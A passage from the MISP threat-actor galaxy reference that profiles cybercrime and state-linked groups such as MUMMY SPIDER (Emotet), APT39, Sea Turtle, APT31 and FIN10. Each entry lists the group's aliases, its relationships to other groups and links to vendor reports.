MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate

The tag is: misp-galaxy:threat-actor="MUMMY SPIDER"

MUMMY SPIDER is also known as:

  • TA542

  • GOLD CRESTWOOD

Table 11955. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return

https://www.secureworks.com/research/threat-profiles/gold-crestwood

STARDUST CHOLLIMA

Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been public reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.

The tag is: misp-galaxy:threat-actor="STARDUST CHOLLIMA"

Table 11956. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

Cold River

In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.

The tag is: misp-galaxy:threat-actor="Cold River"

Cold River is also known as:

  • Nahr Elbard

  • Nahr el bared

Table 11957. Table References

Links

https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/

Silence group

a relatively new threat actor that’s been operating since mid-2016 Group-IB has exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group’s activity in more than 25 countries worldwide. Group-IB has published its first detailed report on tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

The tag is: misp-galaxy:threat-actor="Silence group"

Silence group is also known as:

  • Silence

  • WHISPER SPIDER

Table 11958. Table References

Links

https://reaqta.com/2019/01/silence-group-targeting-russian-banks/

https://www.group-ib.com/blog/silence

https://securelist.com/the-silence/83009/

APT39

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39’s targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.

The tag is: misp-galaxy:threat-actor="APT39"

APT39 is also known as:

  • Chafer

  • REMIX KITTEN

  • COBALT HICKMAN

  • G0087

  • Radio Serpens

  • TA454

Table 11959. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

https://securelist.com/chafer-used-remexi-malware/89538/

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

https://attack.mitre.org/groups/G0087/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://unit42.paloaltonetworks.com/atoms/radioserpens/

Siesta

FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.

The tag is: misp-galaxy:threat-actor="Siesta"

Table 11960. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html

Gallmaker

Symantec researchers have uncovered a previously unknown attack group that is targeting government and military targets, including several overseas embassies of an Eastern European country, and military and defense targets in the Middle East. This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign. The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018.

The tag is: misp-galaxy:threat-actor="Gallmaker"

Table 11961. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

BOSS SPIDER

Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.

The tag is: misp-galaxy:threat-actor="BOSS SPIDER"

BOSS SPIDER is also known as:

  • GOLD LOWELL

Table 11962. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.secureworks.com/research/threat-profiles/gold-lowell

https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit

https://www.secureworks.com/blog/samas-ransomware

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://www.secureworks.com/research/samsam-ransomware-campaigns

PINCHY SPIDER

First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

The tag is: misp-galaxy:threat-actor="PINCHY SPIDER"

Table 11963. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

GURU SPIDER

Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.

The tag is: misp-galaxy:threat-actor="GURU SPIDER"

Table 11964. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

SALTY SPIDER

Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.

The tag is: misp-galaxy:threat-actor="SALTY SPIDER"

Table 11965. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

NOMAD PANDA

In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.

The tag is: misp-galaxy:threat-actor="NOMAD PANDA"

Table 11966. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

Flash Kitten

This suspected Iran-based adversary conducted long-running SWC campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.

The tag is: misp-galaxy:threat-actor="Flash Kitten"

Table 11967. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

TINY SPIDER

According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.

The tag is: misp-galaxy:threat-actor="TINY SPIDER"

Table 11968. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

LUNAR SPIDER

According to CrowdStrike, this actor is using BokBok/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated withGrim Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="LUNAR SPIDER"

LUNAR SPIDER is also known as:

  • GOLD SWATHMORE

Table 11969. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

RATPAK SPIDER

In July 2018, the source code of Pegasus, RATPAK SPIDER’s malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia’s financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.

The tag is: misp-galaxy:threat-actor="RATPAK SPIDER"

Table 11970. Table References

Links

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

APT-C-36

Since April 2018, an APT group (Blind Eagle, APT-C-36) suspected coming from South America carried out continuous targeted attacks against Colombian government institutions as well as important corporations in financial sector, petroleum industry, professional manufacturing, etc.

The tag is: misp-galaxy:threat-actor="APT-C-36"

APT-C-36 is also known as:

  • Blind Eagle

Table 11972. Table References

Links

https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf

https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

https://lab52.io/blog/apt-c-36-recent-activity-analysis/

https://www.trendmicro.com/en_ph/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/

https://attack.mitre.org/groups/G0099/

IRIDIUM

Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States)

The tag is: misp-galaxy:threat-actor="IRIDIUM"

IRIDIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

Table 11973. Table References

Links

https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986

https://threatpost.com/ranian-apt-6tb-data-citrix/142688/

https://hub.packtpub.com/resecurity-reports-iriduim-behind-citrix-data-breach-200-government-agencies-oil-and-gas-companies-and-technology-companies-also-targeted/

SandCat

SandCat, on the other hand, is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier this year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which had a zero-day status when Microsoft released fixes.

The tag is: misp-galaxy:threat-actor="SandCat"

Table 11974. Table References

Links

https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/

Operation Comando

Operation Comando is a pure cybercrime campaign, possibly with Brazilian origin, with a concrete and persistent focus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and having a minimum knowledge on software development (in this case VB.NET) has been enough for running a campaign lasting month, and potentially gathering credit card information and other possible data.

The tag is: misp-galaxy:threat-actor="Operation Comando"

Table 11975. Table References

Links

https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/

APT-C-27

A threat actor which is ac tive since at least November 2014. This group launched long-term at tacks against organizations in the Syrian region using Android and Windows malwares. Its objective is the theft of sensitive information.

The tag is: misp-galaxy:threat-actor="APT-C-27"

APT-C-27 is also known as:

  • GoldMouse

  • Golden RAT

  • ATK80

Table 11976. Table References

Links

https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/

https://ti.360.net/blog/articles/analysis-of-apt-c-27/

https://web.archive.org/web/20180827024318/http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf

Operation ShadowHammer

Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

The tag is: misp-galaxy:threat-actor="Operation ShadowHammer"

Table 11977. Table References

Links

https://securelist.com/operation-shadowhammer/89992/

Whitefly

In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.

The tag is: misp-galaxy:threat-actor="Whitefly"

Table 11978. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/whitefly-espionage-singapore

https://www.reuters.com/article/us-singapore-cyberattack/cyberattack-on-singapore-health-database-steals-details-of-1-5-million-including-pm-idUSKBN1KA14J

Sea Turtle

This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.

The tag is: misp-galaxy:threat-actor="Sea Turtle"

Sea Turtle is also known as:

  • COSMIC WOLF

  • Marbled Dust

  • SILICON

  • Teal Kurma

  • UNC1326

Sea Turtle has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Marbled Dust" with estimative-language:likelihood-probability="likely"

Table 11979. Table References

Links

https://blog.talosintelligence.com/2019/04/seaturtle.html

https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming

https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X

https://icann.zoom.us/recording/play/AhQB4AQyjCuEJGz2wQQans0Xqkz3su8swGLQoORJhdECw9ttz0TbuyzBlue85gIY

https://community.icann.org/download/attachments/109483867/Cybersecurity%20and%20the%20ICANN%20Ecosystem.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2022GTR.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi?id=101738

https://threatintel.eu/2020/02/25/on-sea-turtle-campaign-targeting-greek-governmental-organisations-timeline

https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale

https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf

https://www.youtube.com/watch?v=ws1k44ZhJ3g

Silent Librarian

Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.

The tag is: misp-galaxy:threat-actor="Silent Librarian"

Silent Librarian is also known as:

  • COBALT DICKENS

  • Mabna Institute

  • TA407

  • TA4900

  • Yellow Nabu

Table 11980. Table References

Links

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment

https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic

https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.secureworks.com/research/threat-profiles/cobalt-dickens

https://community.riskiq.com/article/44eb0802

https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect

APT31

FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competetive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. Also according to Crowdstrike, this adversary is suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.

The tag is: misp-galaxy:threat-actor="APT31"

APT31 is also known as:

  • ZIRCONIUM

  • JUDGMENT PANDA

  • BRONZE VINEWOOD

  • Red keres

  • Violet Typhoon

  • TA412

  • Zirconium

APT31 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="ZIRCONIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Violet Typhoon" with estimative-language:likelihood-probability="likely"

Table 11981. Table References

Links

https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/

https://duo.com/decipher/apt-groups-moving-down-the-supply-chain

https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf

https://redalert.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists

https://twitter.com/bkMSFT/status/1201876664667582466

https://www.secureworks.com/research/bronz-vinewood-uses-hanaloader-to-target-government-supply-chain

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://research.checkpoint.com/2021/the-story-of-jian

https://supo.fi/-/suojelupoliisi-tunnisti-eduskuntaan-kohdistuneen-kybervakoiluoperaation-apt31-ksi

https://poliisi.fi/-/eduskunnan-tietojarjestelmiin-kohdistuneen-tietomurron-tutkinnassa-selvitetaan-yhteytta-apt31-toimijaan

https://pst.no/alle-artikler/pressemeldinger/etterforskningen-av-datanettverksoperasjonen-mot-fylkesmannsembetene-er-avsluttet

https://www.nrk.no/norge/pst_-har-etterretning-om-at-kinesisk-gruppe-stod-bak-dataangrep-mot-statsforvaltere-1.15540601

https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory/

https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003

https://twitter.com/bkMSFT/status/1417823714922610689

https://www.mandiant.com/resources/insights/apt-groups

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists

Blackgear

BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.

The tag is: misp-galaxy:threat-actor="Blackgear"

Blackgear is also known as:

  • Topgear

  • Comnie

  • BLACKGEAR

Table 11982. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-espionage-campaign-evolves-adds-japan-target-list/

https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/

BlackOasis

BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.

The tag is: misp-galaxy:threat-actor="BlackOasis"

BlackOasis is also known as:

  • G0063

Table 11983. Table References

Links

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

https://attack.mitre.org/groups/G0063/

BlackTech

BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their target’s technology. Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear. PLEAD is an information theft campaign with a penchant for confidential documents. Active since 2012, it has so far targeted Taiwanese government agencies and private organizations. PLEAD’s toolset includes the self-named PLEAD backdoor and the DRIGO exfiltration tool. PLEAD uses spear-phishing emails to deliver and install their backdoor, either as an attachment or through links to cloud storage services. Some of the cloud storage accounts used to deliver PLEAD are also used as drop off points for exfiltrated documents stolen by DRIGO. PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router’s VPN feature then register a machine as virtual server. This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets.

The tag is: misp-galaxy:threat-actor="BlackTech"

BlackTech is also known as:

  • CIRCUIT PANDA

  • Temp.Overboard

  • HUAPI

  • Palmerworm

  • G0098

  • T-APT-03

  • Manga Taurus

  • Red Djinn

Table 11984. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://unit42.paloaltonetworks.com/atoms/mangataurus/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

FIN5

FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.

The tag is: misp-galaxy:threat-actor="FIN5"

FIN5 is also known as:

  • G0053

Table 11985. Table References

Links

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://attack.mitre.org/groups/G0053/

FIN1

FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.

The tag is: misp-galaxy:threat-actor="FIN1"

Table 11986. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

FIN10

FireEye has observed multiple targeted intrusions occurring in North America — predominately in Canada — dating back to at least 2013 and continuing through at least 2016, in which the attacker(s) have compromised organizations’ networks and sought to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations. In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems. Based on near parallel TTPs used by the attacker(s) across these targeted intrusions, we believe these clusters of activity are linked to a single, previously unobserved actor or group that we have dubbed FIN10.

The tag is: misp-galaxy:threat-actor="FIN10"

FIN10 is also known as:

  • G0051

Table 11987. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

https://attack.mitre.org/groups/G0051/

GhostNet

Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information. Attacks on the Dalai Lama’s Private Office The OHHDL started to suspect it was under surveillance while setting up meetings be-tween His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat’s office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)

The tag is: misp-galaxy:threat-actor="GhostNet"

GhostNet is also known as:

  • Snooping Dragon

Table 11988. Table References

Links

http://www.nartv.org/mirror/ghostnet.pdf

https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-746.pdf

https://en.wikipedia.org/wiki/GhostNet

GozNym

IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.

The tag is: misp-galaxy:threat-actor="GozNym"

Table 11989. Table References

Links

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/

https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/

